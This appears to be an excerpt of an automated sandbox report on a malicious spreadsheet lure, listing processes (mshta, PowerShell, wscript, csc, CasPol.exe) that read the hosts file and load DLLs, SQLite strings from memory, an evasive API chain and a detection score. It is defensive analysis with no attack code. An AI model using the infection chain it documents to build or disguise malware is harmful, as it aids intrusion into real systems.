Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: CasPol.exe, CasPol.exe, 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: A & C Metrology OC 545714677889Materiale.xls

ReversingLabs: Detection: 21%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Evasive API call chain: __getmainargs,DecisionNodes,exit

Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64win.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wow64cpu.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winmm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: shcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dhcpcsvc.dll
